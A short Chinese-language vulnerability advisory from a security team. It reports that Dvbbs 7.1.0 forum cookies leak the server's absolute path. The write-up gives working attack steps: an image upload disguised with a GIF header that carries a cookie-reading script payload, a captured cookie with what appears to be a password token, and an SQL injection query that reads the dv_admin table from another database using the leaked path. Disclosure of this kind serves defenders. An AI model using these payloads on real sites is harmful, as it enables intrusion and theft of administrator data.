| 文章作者:LiNZI[B.C.T]@www.cnbct.org 信息来源:邪恶八进制信息安全团队 厂商名字:动网先锋论谈 厂商地址:http://www.dvbbs.net/ 漏洞程序:Dvbbs 7.1.0 漏洞描述: Dvbbs 7.1.0 的Cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现SQL跨库查询等。 漏洞利用例子: 一、泄露绝对漏洞测试: 对官方的测试站点:bbs.dvbbs.net 上传一张图,代码如下: GIF89a <script>alert(document.cookie)</script> 抓包得到cookie如下 Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; dwebdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; Dvbbs= 分析cookie可以得到站点的绝对路径如下: d:\\web\\dvbbs7为论谈的绝对路径 二、攻击延伸: www.host.com 主程序存在sql注入漏洞,但是找不到表名和字段名。 注入点假设: www.host.com\\linzi.asp?fuck=you 论谈为dvbbs 7.1.0 ,数据库为data\\\\dvbbs.asp,做了防下载处理. 利用上面的动网暴路径,抓包得到绝对路径为 d:\\www\\dvbbs\\data\\dvbbs.asp 实现跨库查询如下: www.host.com\\linzi.asp?fuck=you and (select count(*) from dv_admin in "d:\\www\\dvbbs\\data\\dvbbs.asp") 官方补丁: 尚无 |
Dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞
0
相关文章